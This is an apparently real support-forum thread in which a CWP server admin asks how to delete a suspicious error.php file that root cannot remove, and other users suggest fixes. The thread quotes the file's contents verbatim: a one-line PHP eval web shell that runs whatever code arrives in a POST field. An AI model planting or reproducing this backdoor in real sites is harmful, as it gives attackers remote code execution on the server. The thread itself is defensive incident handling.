Cannot Delete File

On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).

Code: [Select]

whoami returns `root`.

Code: [Select]

rm -rf error.phpreturns “Permission denied.”

Code: [Select]

lsattr error.php returns `-------------e-- error.php`.

Code: [Select]

getfacl error.php returns:
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```

Code: [Select]

mount | grep "$(df error.php | tail -1 | awk '{print $1}')" Returns:

`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`

This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?

Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:

Code: [Select]

chattr -i error.php
rm -rf error.php

That did not work. I have remove the I(mmutable) and e(xtent) flags. lsattr returns --------------.

Ditto to what @overseer posted.

On our AL9 servers, there is no error.php in usr/local/cwpsrv/htdocs/admin/admin

1 other thing you can try is goto User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'